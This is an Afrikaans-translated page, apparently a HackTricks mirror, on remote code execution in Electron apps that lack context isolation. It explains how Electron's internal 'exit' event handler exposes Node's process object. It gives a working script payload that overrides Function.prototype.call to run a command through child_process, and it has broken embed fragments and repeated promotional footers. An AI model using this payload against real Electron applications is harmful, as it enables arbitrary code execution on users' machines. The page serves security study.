4.4 KiB
Electron contextIsolation RCE via Electron interne kode
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
- Werk jy by 'n cybersekuriteitsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die INSKRYWINGSPLANNE!
- Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
- Kry die amptelike PEASS & HackTricks swag
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die hacktricks-opslag en hacktricks-cloud-opslag.
Voorbeeld 1
Voorbeeld van https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41
"exit" gebeurtenisluister word altyd deur die interne kode ingestel wanneer die bladsy se laai begin. Hierdie gebeurtenis word uitgestraal net voor navigasie:
process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})
{% embed url="664c184fcb/lib/common/asar.js (L30-L36)
" %}
8a44289089/bin/events.js (L156-L231)
-- Bestaan nie meer nie
Dan gaan dit hierheen:
Waar "self" Node se prosesobjek is:
Die prosesobjek het 'n verwysing na die "require" funksie:
process.mainModule.require
Aangesien die handler.call die process objek gaan ontvang, kan ons dit oorskryf om willekeurige kode uit te voer:
<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>
Voorbeeld 2
Kry vereis voorwerp vanaf prototipe besoedeling. Vanaf https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81
Lek:
![](/Mirrors/hacktricks/media/commit/a107721dbf2cd1159ad7353d201294212cc903e6/.gitbook/assets/image%20%28276%29.png)
Exploiteer:
![](/Mirrors/hacktricks/media/commit/a107721dbf2cd1159ad7353d201294212cc903e6/.gitbook/assets/image%20%2886%29.png)
Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
- Werk jy in 'n cybersekerheidsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die INSKRYWINGSPLANNE!
- Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
- Kry die amptelike PEASS & HackTricks swag
- Sluit aan by die 💬 Discord groep of die telegram groep of volg my op Twitter 🐦@carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die hacktricks repo en hacktricks-cloud repo.